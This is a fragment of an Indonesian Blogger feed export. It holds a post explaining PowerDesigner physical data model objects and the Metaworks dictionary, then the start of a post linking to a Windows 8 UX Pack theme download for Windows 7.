&lt;li class=&quot;MsoNormal&quot; style=&quot;line-height: 18px; text-align: justify;&quot;&gt;&lt;span lang=&quot;DE&quot; style=&quot;background-color: black; color: white;&quot;&gt;Mengkonversi dari suatu database ke dalam suatu PDM&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;div class=&quot;MsoNormal&quot; style=&quot;font-family: Arial, Helvetica, sans-serif; font-size: 12px; line-height: 18px; text-align: justify;&quot;&gt;
&lt;span lang=&quot;DE&quot; style=&quot;background-color: black; color: white;&quot;&gt;Suatu PDM menggambarkan interaksi dari beberapa object berikut :&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; style=&quot;font-family: Arial, Helvetica, sans-serif; font-size: 12px; line-height: 18px; text-align: justify;&quot;&gt;
&lt;span lang=&quot;DE&quot; style=&quot;background-color: black; color: white;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;
&lt;table border=&quot;1&quot; cellpadding=&quot;0&quot; cellspacing=&quot;0&quot; class=&quot;MsoTableGrid&quot; style=&quot;border-collapse: collapse; border: none; font-family: Arial, Helvetica, sans-serif; font-size: 12px; line-height: 20px; margin-bottom: 20px; margin-left: 11.4pt; width: 500px;&quot;&gt;&lt;tbody&gt;
&lt;tr&gt;&lt;td style=&quot;border: 1pt solid windowtext; padding: 0in 5.4pt; width: 74.8pt;&quot; valign=&quot;top&quot; width=&quot;100&quot;&gt;&lt;div class=&quot;MsoNormal&quot; style=&quot;line-height: 18px;&quot;&gt;
&lt;span lang=&quot;DE&quot; style=&quot;background-color: black; color: white;&quot;&gt;Object&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;
&lt;/td&gt;&lt;td style=&quot;border: 1pt solid windowtext; padding: 0in 5.4pt; width: 300.05pt;&quot; valign=&quot;top&quot; width=&quot;400&quot;&gt;&lt;div class=&quot;MsoNormal&quot; style=&quot;line-height: 18px;&quot;&gt;
&lt;span style=&quot;background-color: black;&quot;&gt;&lt;span style=&quot;color: white;&quot;&gt;keterangan&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/span&gt;&lt;/div&gt;
&lt;/td&gt;&lt;/tr&gt;
&lt;tr&gt;&lt;td style=&quot;border: 1pt solid windowtext; padding: 0in 5.4pt; width: 74.8pt;&quot; valign=&quot;top&quot; width=&quot;100&quot;&gt;&lt;div class=&quot;MsoNormal&quot; style=&quot;line-height: 18px;&quot;&gt;
&lt;span lang=&quot;DE&quot; style=&quot;background-color: black; color: white;&quot;&gt;Table&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;
&lt;/td&gt;&lt;td style=&quot;border-bottom-color: windowtext; border-bottom-width: 1pt; border-right-color: windowtext; border-right-width: 1pt; border-style: none solid solid none; padding: 0in 5.4pt; width: 300.05pt;&quot; valign=&quot;top&quot; width=&quot;400&quot;&gt;&lt;div class=&quot;MsoNormal&quot; style=&quot;line-height: 18px;&quot;&gt;
&lt;span lang=&quot;DE&quot; style=&quot;background-color: black; color: white;&quot;&gt;Kumpulan dari baris-baris (record)&amp;nbsp; dan kolom-kolom (fields)&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;
&lt;/td&gt;&lt;/tr&gt;
&lt;tr&gt;&lt;td style=&quot;border: 1pt solid windowtext; padding: 0in 5.4pt; width: 74.8pt;&quot; valign=&quot;top&quot; width=&quot;100&quot;&gt;&lt;div class=&quot;MsoNormal&quot; style=&quot;line-height: 18px;&quot;&gt;
&lt;span lang=&quot;DE&quot; style=&quot;background-color: black; color: white;&quot;&gt;colomn&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;
&lt;/td&gt;&lt;td style=&quot;border-bottom-color: windowtext; border-bottom-width: 1pt; border-right-color: windowtext; border-right-width: 1pt; border-style: none solid solid none; padding: 0in 5.4pt; width: 300.05pt;&quot; valign=&quot;top&quot; width=&quot;400&quot;&gt;&lt;div class=&quot;MsoNormal&quot; style=&quot;line-height: 18px;&quot;&gt;
&lt;span style=&quot;background-color: black;&quot;&gt;&lt;span style=&quot;color: white;&quot;&gt;Struktur data yang berisi data item atau attribute didalam suatu baris (record), suatu model persamaan dari kolom database (fileds)&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/span&gt;&lt;/div&gt;
&lt;/td&gt;&lt;/tr&gt;
&lt;tr&gt;&lt;td style=&quot;border: 1pt solid windowtext; padding: 0in 5.4pt; width: 74.8pt;&quot; valign=&quot;top&quot; width=&quot;100&quot;&gt;&lt;div class=&quot;MsoNormal&quot; style=&quot;line-height: 18px;&quot;&gt;
&lt;span lang=&quot;DE&quot; style=&quot;background-color: black; color: white;&quot;&gt;Primery Key&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;
&lt;/td&gt;&lt;td style=&quot;border-bottom-color: windowtext; border-bottom-width: 1pt; border-right-color: windowtext; border-right-width: 1pt; border-style: none solid solid none; padding: 0in 5.4pt; width: 300.05pt;&quot; valign=&quot;top&quot; width=&quot;400&quot;&gt;&lt;div class=&quot;MsoNormal&quot; style=&quot;line-height: 18px;&quot;&gt;
&lt;span lang=&quot;DE&quot; style=&quot;background-color: black; color: white;&quot;&gt;colomn yang memiliki nilai unik mengidentifikasikan suatu baris dalam tabel&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;
&lt;/td&gt;&lt;/tr&gt;
&lt;tr&gt;&lt;td style=&quot;border: 1pt solid windowtext; padding: 0in 5.4pt; width: 74.8pt;&quot; valign=&quot;top&quot; width=&quot;100&quot;&gt;&lt;div class=&quot;MsoNormal&quot; style=&quot;line-height: 18px;&quot;&gt;
&lt;span lang=&quot;DE&quot; style=&quot;background-color: black; color: white;&quot;&gt;Foriegn key&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;
&lt;/td&gt;&lt;td style=&quot;border-bottom-color: windowtext; border-bottom-width: 1pt; border-right-color: windowtext; border-right-width: 1pt; border-style: none solid solid none; padding: 0in 5.4pt; width: 300.05pt;&quot; valign=&quot;top&quot; width=&quot;400&quot;&gt;&lt;div class=&quot;MsoNormal&quot; style=&quot;line-height: 18px;&quot;&gt;
&lt;span lang=&quot;DE&quot; style=&quot;background-color: black; color: white;&quot;&gt;colomn yang memiliki nilai tergantung dari primary key dalam tabel yang lain (relation tabel)&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;
&lt;/td&gt;&lt;/tr&gt;
&lt;tr&gt;&lt;td style=&quot;border: 1pt solid windowtext; padding: 0in 5.4pt; width: 74.8pt;&quot; valign=&quot;top&quot; width=&quot;100&quot;&gt;&lt;div class=&quot;MsoNormal&quot; style=&quot;line-height: 18px;&quot;&gt;
&lt;span lang=&quot;DE&quot; style=&quot;background-color: black; color: white;&quot;&gt;index&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;
&lt;/td&gt;&lt;td style=&quot;border-bottom-color: windowtext; border-bottom-width: 1pt; border-right-color: windowtext; border-right-width: 1pt; border-style: none solid solid none; padding: 0in 5.4pt; width: 300.05pt;&quot; valign=&quot;top&quot; width=&quot;400&quot;&gt;&lt;div class=&quot;MsoNormal&quot; style=&quot;line-height: 18px;&quot;&gt;
&lt;span style=&quot;background-color: black;&quot;&gt;&lt;span style=&quot;color: white;&quot;&gt;Struktur data yang didasarkan pada suatu kunci (key), didasarkan pada kecepatan akses dan nilai control tertentu&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/span&gt;&lt;/div&gt;
&lt;/td&gt;&lt;/tr&gt;
&lt;tr&gt;&lt;td style=&quot;border: 1pt solid windowtext; padding: 0in 5.4pt; width: 74.8pt;&quot; valign=&quot;top&quot; width=&quot;100&quot;&gt;&lt;div class=&quot;MsoNormal&quot; style=&quot;line-height: 18px;&quot;&gt;
&lt;span lang=&quot;DE&quot; style=&quot;background-color: black; color: white;&quot;&gt;reference&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;
&lt;/td&gt;&lt;td style=&quot;border-bottom-color: windowtext; border-bottom-width: 1pt; border-right-color: windowtext; border-right-width: 1pt; border-style: none solid solid none; padding: 0in 5.4pt; width: 300.05pt;&quot; valign=&quot;top&quot; width=&quot;400&quot;&gt;&lt;div class=&quot;MsoNormal&quot; style=&quot;line-height: 18px;&quot;&gt;
&lt;span style=&quot;background-color: black;&quot;&gt;&lt;span style=&quot;color: white;&quot;&gt;hubungan antara primary key dan foreign key dari tabel yang berbeda&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/span&gt;&lt;/div&gt;
&lt;/td&gt;&lt;/tr&gt;
&lt;tr&gt;&lt;td style=&quot;border: 1pt solid windowtext; padding: 0in 5.4pt; width: 74.8pt;&quot; valign=&quot;top&quot; width=&quot;100&quot;&gt;&lt;div class=&quot;MsoNormal&quot; style=&quot;line-height: 18px;&quot;&gt;
&lt;span style=&quot;background-color: black;&quot;&gt;&lt;span style=&quot;color: white;&quot;&gt;view&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/span&gt;&lt;/div&gt;
&lt;/td&gt;&lt;td style=&quot;border-bottom-color: windowtext; border-bottom-width: 1pt; border-right-color: windowtext; border-right-width: 1pt; border-style: none solid solid none; padding: 0in 5.4pt; width: 300.05pt;&quot; valign=&quot;top&quot; width=&quot;400&quot;&gt;&lt;div class=&quot;MsoNormal&quot; style=&quot;line-height: 18px;&quot;&gt;
&lt;span style=&quot;background-color: black;&quot;&gt;&lt;span style=&quot;color: white;&quot;&gt;Struktur data yang merupakan hasil dari query sql dan dibangun dari data di dalam satu atau banyak tabel&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/span&gt;&lt;/div&gt;
&lt;/td&gt;&lt;/tr&gt;
&lt;/tbody&gt;&lt;/table&gt;
&lt;div class=&quot;MsoNormal&quot; style=&quot;font-family: Arial, Helvetica, sans-serif; font-size: 12px; line-height: 18px; text-align: justify;&quot;&gt;
&lt;span style=&quot;background-color: black;&quot;&gt;&lt;span style=&quot;color: white;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; style=&quot;font-family: Arial, Helvetica, sans-serif; font-size: 12px; line-height: 18px; text-align: justify;&quot;&gt;
&lt;span style=&quot;background-color: black;&quot;&gt;&lt;span style=&quot;color: white;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; style=&quot;font-family: Arial, Helvetica, sans-serif; font-size: 12px; line-height: 18px; text-align: justify;&quot;&gt;
&lt;b style=&quot;background-color: black;&quot;&gt;&lt;span style=&quot;color: white;&quot;&gt;C. Metaworks&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/b&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; style=&quot;font-family: Arial, Helvetica, sans-serif; font-size: 12px; line-height: 18px; text-indent: 0.5in;&quot;&gt;
&lt;span style=&quot;background-color: black;&quot;&gt;&lt;span style=&quot;color: white;&quot;&gt;Metaworks merupakan kamus adalah suatu alat untuk me-manage pengembangan aplikasi di dalam suatu kelompok lingkungan perangkat lunak&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; style=&quot;font-family: Arial, Helvetica, sans-serif; font-size: 12px; line-height: 18px;&quot;&gt;
&lt;span lang=&quot;DE&quot; style=&quot;background-color: black; color: white;&quot;&gt;Dengan menggunakan Metaworks kamus kita dapat:&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; style=&quot;font-family: Arial, Helvetica, sans-serif; font-size: 12px; line-height: 18px; margin-left: 28.35pt; text-indent: -14.15pt;&quot;&gt;
&lt;span style=&quot;background-color: black;&quot;&gt;&lt;span style=&quot;color: white;&quot;&gt;&lt;span lang=&quot;DE&quot; style=&quot;font-family: Symbol;&quot;&gt;·&lt;span style=&quot;font-family: &#39;Times New Roman&#39;; font-size: 7pt; line-height: normal;&quot;&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&lt;/span&gt;&lt;/span&gt;&lt;span lang=&quot;DE&quot;&gt;Menciptakan profil dan rekening/tg-jawab untuk para pemakai kamus&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; style=&quot;font-family: Arial, Helvetica, sans-serif; font-size: 12px; line-height: 18px; margin-left: 28.35pt; text-indent: -14.15pt;&quot;&gt;
&lt;span style=&quot;background-color: black;&quot;&gt;&lt;span style=&quot;color: white;&quot;&gt;&lt;span lang=&quot;DE&quot; style=&quot;font-family: Symbol;&quot;&gt;·&lt;span style=&quot;font-family: &#39;Times New Roman&#39;; font-size: 7pt; line-height: normal;&quot;&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&lt;/span&gt;&lt;/span&gt;&lt;span lang=&quot;DE&quot;&gt;Menciptakan proyek, model dan submodels, dan menugaskan [mereka/nya] ke para pemakai&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; style=&quot;font-family: Arial, Helvetica, sans-serif; font-size: 12px; line-height: 18px; margin-left: 28.35pt; text-indent: -14.15pt;&quot;&gt;
&lt;span style=&quot;background-color: black;&quot;&gt;&lt;span style=&quot;color: white;&quot;&gt;&lt;span lang=&quot;DE&quot; style=&quot;font-family: Symbol;&quot;&gt;·&lt;span style=&quot;font-family: &#39;Times New Roman&#39;; font-size: 7pt; line-height: normal;&quot;&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&lt;/span&gt;&lt;/span&gt;&lt;span lang=&quot;DE&quot;&gt;Mengunci dan membuka kunci model&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; style=&quot;font-family: Arial, Helvetica, sans-serif; font-size: 12px; line-height: 18px; margin-left: 28.35pt; text-indent: -14.15pt;&quot;&gt;
&lt;span style=&quot;background-color: black;&quot;&gt;&lt;span style=&quot;color: white;&quot;&gt;&lt;span style=&quot;font-family: Symbol;&quot;&gt;·&lt;span style=&quot;font-family: &#39;Times New Roman&#39;; font-size: 7pt; line-height: normal;&quot;&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&lt;/span&gt;&lt;/span&gt;Menyuling/Menyadap dan memperkuat model dan submodels&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; style=&quot;font-family: Arial, Helvetica, sans-serif; font-size: 12px; line-height: 18px; margin-left: 28.35pt; text-indent: -14.15pt;&quot;&gt;
&lt;span style=&quot;background-color: black;&quot;&gt;&lt;span style=&quot;color: white;&quot;&gt;&lt;span lang=&quot;DE&quot; style=&quot;font-family: Symbol;&quot;&gt;·&lt;span style=&quot;font-family: &#39;Times New Roman&#39;; font-size: 7pt; line-height: normal;&quot;&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&lt;/span&gt;&lt;/span&gt;&lt;span lang=&quot;DE&quot;&gt;Membandingkan definisi obyek dan mengatur konflik data&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; style=&quot;font-family: Arial, Helvetica, sans-serif; font-size: 12px; line-height: 18px; margin-left: 28.35pt; text-indent: -14.15pt;&quot;&gt;
&lt;span style=&quot;background-color: black;&quot;&gt;&lt;span style=&quot;color: white;&quot;&gt;&lt;span lang=&quot;DE&quot; style=&quot;font-family: Symbol;&quot;&gt;·&lt;span style=&quot;font-family: &#39;Times New Roman&#39;; font-size: 7pt; line-height: normal;&quot;&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&lt;/span&gt;&lt;/span&gt;&lt;span lang=&quot;DE&quot;&gt;Membuat kamus query&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; style=&quot;font-family: Arial, Helvetica, sans-serif; font-size: 12px; line-height: 18px; margin-left: 28.35pt; text-align: justify; text-indent: -14.15pt;&quot;&gt;
&lt;span style=&quot;background-color: black;&quot;&gt;&lt;span style=&quot;color: white;&quot;&gt;&lt;span style=&quot;font-family: Symbol;&quot;&gt;·&lt;span style=&quot;font-family: &#39;Times New Roman&#39;; font-size: 7pt; line-height: normal;&quot;&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&lt;/span&gt;&lt;/span&gt;Memodifikasi object di (dalam) kamus&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; style=&quot;font-family: Arial, Helvetica, sans-serif; font-size: 12px; line-height: 18px; text-indent: 0.5in;&quot;&gt;
&lt;span style=&quot;background-color: black;&quot;&gt;&lt;span style=&quot;color: white;&quot;&gt;Apa yang merupakan tujuan dari suatu kamus?Bagian ini menjelaskan bagaimana&amp;nbsp; kamus Metaworks dapat membantu kamu untuk mengembangkan aplikasi.&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; style=&quot;font-family: Arial, Helvetica, sans-serif; font-size: 12px; line-height: 18px; margin: 6pt 0in 0in 14.2pt; text-indent: -14.2pt;&quot;&gt;
&lt;span style=&quot;background-color: black;&quot;&gt;&lt;span style=&quot;color: white;&quot;&gt;&lt;b&gt;1.&lt;span style=&quot;font-size: 7pt; font-weight: normal; line-height: normal;&quot;&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&lt;/span&gt;&lt;/b&gt;&lt;b&gt;Memungkinkan kerjasama sekelompok&lt;o:p&gt;&lt;/o:p&gt;&lt;/b&gt;&lt;/span&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; style=&quot;font-family: Arial, Helvetica, sans-serif; font-size: 12px; line-height: 18px; margin-left: 0.25in; text-align: justify;&quot;&gt;
&lt;span lang=&quot;DE&quot; style=&quot;background-color: black; color: white;&quot;&gt;Manakala mengembang;kan aplikasi yang besar diperlukan pembagian dan organisasi tenaga kerja. Hal ini dimungkinkan untuk menyimpan atau memelihara aplikasi yang besar seghingga &amp;nbsp;dapat dikendalikan dalam &amp;nbsp;dunia waktu nyata. Para pengembang dapat &amp;nbsp;Berbagi informasi, membuat aplikasi &amp;nbsp;secara bersama-sama.&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; style=&quot;font-family: Arial, Helvetica, sans-serif; font-size: 12px; line-height: 18px; margin: 6pt 0in 0in 14.2pt; text-indent: -14.2pt;&quot;&gt;
&lt;span style=&quot;background-color: black;&quot;&gt;&lt;span style=&quot;color: white;&quot;&gt;&lt;b&gt;&lt;span lang=&quot;DE&quot;&gt;2.&lt;span style=&quot;font-size: 7pt; font-weight: normal; line-height: normal;&quot;&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&lt;/span&gt;&lt;/span&gt;&lt;/b&gt;&lt;b&gt;&lt;span lang=&quot;DE&quot;&gt;Memastikan integritas data&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/b&gt;&lt;/span&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; style=&quot;font-family: Arial, Helvetica, sans-serif; font-size: 12px; line-height: 18px; margin-left: 0.25in; text-align: justify; text-indent: 30pt;&quot;&gt;
&lt;span lang=&quot;DE&quot; style=&quot;background-color: black; color: white;&quot;&gt;Team perancang memberikan permasalahan yang serupa kepada user lain yang jumpai di (dalam) multiuser database. Para perancang mungkin punya daerah tanggung jawab yang tumpang-tindih dan boleh mengakses data yang sama secara serempak, hal ini akan dapatmembahayakan integritas data. Oleh karena itu perlu komunikasi dan kerjasama secara saksama dan kontinyu antar anggota.&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; style=&quot;font-family: Arial, Helvetica, sans-serif; font-size: 12px; line-height: 18px; margin-left: 0.25in; text-align: justify; text-indent: 30pt;&quot;&gt;
&lt;span lang=&quot;DE&quot; style=&quot;background-color: black; color: white;&quot;&gt;Kamus Metaworks membantu pengembang&amp;nbsp; memastikan integritas data selagi sejumlah besar para pemakai mengijinkan untuk mengakses data yang sama.&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; style=&quot;font-family: Arial, Helvetica, sans-serif; font-size: 12px; line-height: 18px; margin: 6pt 0in 0in 14.2pt; text-indent: -14.2pt;&quot;&gt;
&lt;span style=&quot;background-color: black;&quot;&gt;&lt;span style=&quot;color: white;&quot;&gt;&lt;b&gt;&lt;span lang=&quot;DE&quot;&gt;3.&lt;span style=&quot;font-size: 7pt; font-weight: normal; line-height: normal;&quot;&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&lt;/span&gt;&lt;/span&gt;&lt;/b&gt;&lt;b&gt;&lt;span lang=&quot;DE&quot;&gt;Memastikan konsistensi&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/b&gt;&lt;/span&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; style=&quot;font-family: Arial, Helvetica, sans-serif; font-size: 12px; line-height: 18px; margin-left: 0.25in; text-align: justify; text-indent: 30pt;&quot;&gt;
&lt;span style=&quot;background-color: black;&quot;&gt;&lt;span style=&quot;color: white;&quot;&gt;&lt;span lang=&quot;DE&quot;&gt;Yang tidak kalah penting untuk team perancang aplikasi adalah pemusatan data.&amp;nbsp;&lt;/span&gt;Dengan ituteam perancang dapat menggunakan kembali bagian-bagian dari model, adalah mungkin untuk membangun aplikasi tambahan selagi pemeliharaan model tetap (konsisten). Sehingga keseluruhan proses pengembangan akan menjadi&amp;nbsp; lebih efisien. Kamus &amp;nbsp;Metaworks memusatkan data disain untuk semua sistem informasi aplikasi dan dapat memastikan kecocokan dan konsistensi dari&amp;nbsp; aplikasi yang berbeda .&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; style=&quot;font-family: Arial, Helvetica, sans-serif; font-size: 12px; line-height: 18px; margin: 9pt 0in 0in 14.2pt; text-indent: -14.2pt;&quot;&gt;
&lt;span style=&quot;background-color: black;&quot;&gt;&lt;span style=&quot;color: white;&quot;&gt;&lt;b&gt;&lt;span lang=&quot;DE&quot;&gt;4.&lt;span style=&quot;font-size: 7pt; font-weight: normal; line-height: normal;&quot;&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&lt;/span&gt;&lt;/span&gt;&lt;/b&gt;&lt;b&gt;&lt;span lang=&quot;DE&quot;&gt;Memungkinkan data untuk bersama&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/b&gt;&lt;/span&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; style=&quot;font-family: Arial, Helvetica, sans-serif; font-size: 12px; line-height: 18px; margin-left: 0.25in; text-align: justify; text-indent: 30pt;&quot;&gt;
&lt;span lang=&quot;DE&quot; style=&quot;background-color: black; color: white;&quot;&gt;Di dalam banyak organisasi, aplikasi jarang beroperasi dengan bebas dari satu/ orang ke orang lain. Operasi mandiri akan bisa dipastikan di dalam data inconsistencies dan akan mendorong kearah suatu gangguan di&amp;nbsp; dalam sistem informasi. Kamus &amp;nbsp;Metaworks membantu team perancang mengatur definisi daerah dan data. [kamus metaworks akan menyimpan semua data di dalam sistem informasi, dan mungkin dapat digunakan&amp;nbsp; untuk proyek yang berbeda. Hal ini memungkinkan semua para perancang, mengikuti hak akses yang sudah dikenal mereka.&lt;/span&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; style=&quot;font-family: Arial, Helvetica, sans-serif; font-size: 12px; line-height: 18px; margin-left: 0.25in; text-align: justify; text-indent: 30pt;&quot;&gt;
&lt;span lang=&quot;DE&quot; style=&quot;background-color: black; color: white;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; style=&quot;font-family: Arial, Helvetica, sans-serif; font-size: 12px; line-height: 18px; margin-left: 0.25in; text-align: justify; text-indent: 30pt;&quot;&gt;
&lt;span style=&quot;background-color: black;&quot;&gt;&lt;span style=&quot;color: white;&quot;&gt;sumber:&amp;nbsp;&lt;a href=&quot;http://mumedmedia.blogspot.com/2013/01/pengenalan-power-designer.html&quot;&gt;http://mumedmedia.blogspot.com/2013/01/pengenalan-power-designer.html&lt;/a&gt;&lt;/span&gt;&lt;/span&gt;&lt;/div&gt;
</content><link rel='replies' type='application/atom+xml' href='http://abrian-pamungkaz.blogspot.com/feeds/1433500194415648551/comments/default' title='Posting Komentar'/><link rel='replies' type='text/html' href='http://abrian-pamungkaz.blogspot.com/2015/08/pengertian-power-desain.html#comment-form' title='0 Komentar'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/8688056575447479178/posts/default/1433500194415648551'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/8688056575447479178/posts/default/1433500194415648551'/><link rel='alternate' type='text/html' href='http://abrian-pamungkaz.blogspot.com/2015/08/pengertian-power-desain.html' title='Pengertian Power Desain'/><author><name>Anonymous</name><uri>http://www.blogger.com/profile/10384159654684346439</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='https://img1.blogblog.com/img/b16-rounded.gif'/></author><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiclUh3F2N48ChZNOEPYw3fvPhNvcjjQBTT6zPjD6hxGU0iPjsQIi1IesjUKKAvNGA7O8VgzFBjKJFeqGjY3fAPTHoDnnqEMfYhU2G1dMuUXFp8VJSzXTGabdElwnQ2u1n75TdC6lo70msm/s72-c/power-design++6.jpg" height="72" width="72"/><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-8688056575447479178.post-5307628277330019668</id><published>2013-02-26T04:25:00.000-08:00</published><updated>2013-02-26T04:25:01.893-08:00</updated><category scheme="http://www.blogger.com/atom/ns#" term="Download"/><category scheme="http://www.blogger.com/atom/ns#" term="tips-trick"/><title type='text'>Cara Merubah Windows 7 Ke Windows 8</title><content type='html'>
nah sebelum melangkah ke tingkat selanjut nya saya akan membagikan link download untuk &lt;b&gt;merubah tampilan windows 7 ke windows 8&lt;/b&gt;&amp;nbsp;&amp;nbsp; &lt;a href=&quot;http://www.thememypc.com/windows-8-ux-pack-6-5/&quot; target=&quot;_blank&quot;&gt;Download Windows 8 ux Pack 6.5&lt;/a&gt;&lt;br /&gt;
&lt;span lang=&quot;IN&quot;&gt;&lt;/span&gt;&lt;span lang=&quot;IN&quot;&gt;&lt;br /&gt;Untuk proses instal windows 8 ux Pack 6.5 nya, sangatlah mudah berikut penampakan &lt;/span&gt;&lt;span lang=&quot;IN&quot;&gt;&amp;nbsp;&lt;/span&gt;&lt;br /&gt;
&lt;span lang=&quot;IN&quot;&gt;Windows 8 ux Pack 6.5 :&lt;/span&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;div class=&quot;MsoNormal&quot;&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEik4CxocgYWsWD1W3X9FBEarvn2h8DAg_fqe2d7EZGKAMV027feIAookfpIFP4p7LRE4Pdrnrnq5QV7hLKBfHzzPG95KbUsA6MCbEQ3jgdL7__xLooH3ECy6PLxBK2oUKaLwlEFtzCE7peu/s1600/win+trans.jpg&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img alt=&quot;proses instal windows 8 ux Pack 6.5&quot; border=&quot;0&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEik4CxocgYWsWD1W3X9FBEarvn2h8DAg_fqe2d7EZGKAMV027feIAookfpIFP4p7LRE4Pdrnrnq5QV7hLKBfHzzPG95KbUsA6MCbEQ3jgdL7__xLooH3ECy6PLxBK2oUKaLwlEFtzCE7peu/s1600/win+trans.jpg&quot; title=&quot;proses instal windows 8 ux Pack 6.5&quot; /&gt;&lt;/a&gt;&lt;/div&gt;
Tinggal klik instal gan terus ikutin aja langkah selanjut nya, mudah kok :D&lt;br /&gt;
&lt;/div&gt;
